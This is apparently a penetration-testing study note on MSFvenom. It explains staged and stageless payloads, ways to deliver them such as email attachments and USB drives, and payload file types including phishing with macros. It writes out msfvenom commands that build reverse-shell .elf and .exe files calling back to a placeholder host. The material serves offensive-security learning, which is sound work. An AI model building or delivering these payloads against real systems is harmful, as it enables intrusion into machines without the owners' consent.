MSFvenom
//List all available payloads
msfvenom -l payloadsStaged Payloads
Create a way for us to sent over more components of our attack, think of it like "setting the stage" for something more useful (for example:
linux/x86/shell/reverse_tcp)Keep in mind that a stage also takes up space in memory which leaves less space for the payload.
Stageless Payloads
Do not have a stage (for example:
linux/zarch/meterpreter_reverse_tcp)These might be useful when we do not have too much bandwidth and latency can interfere
These can be more stable than staged payloads
Can be better for evasion purposed because of less traffic passing over the network to execute the payload.
Common ways to deliver the stageless payloads
Email with file attached
Download link on a website
Combined with a Metasploit exploit module (require us to be on the internal network)
USB drive
Example Stageless Payloads
// .elf file
msfvenom -p linux/x64/shell_reverse_tcp LHOST=x.x.x.x LPORT=x -f elf >FILE_NAME.elf
// .exe file
msfvenom -p windows/shell_reverse_tcp LHOST=x.x.x.x LPORT=x -f exe > FILE_NAME.exePayload Types to Consider
DLLs
A library used in Microsoft to provide shared code and data that can be used by many different programs at once.
Covered more in depth here - DLLs
Batch
Batch files are text DOS scripts used to complete multiple tasks through the CLI
End with extension of
.bat
VBS
VBScript is a lightweight scripting language based on Microsoft's Visual Basic.
Usually used as a client-side scripting language in webservers to enable dynamic web pages.
Dated and disabled by most modern web browsers but can be used in the context of phishing and other attacks aimed at having users perform an action such as enabling Macros in an excel doc.
MSI
.MSIfiles serve as an installation database for the Windows installer.installer will look for the
.msifile to understand all the components needed and how to find them.
Powershell
Powershell is both a shell and a scripting language
Last updated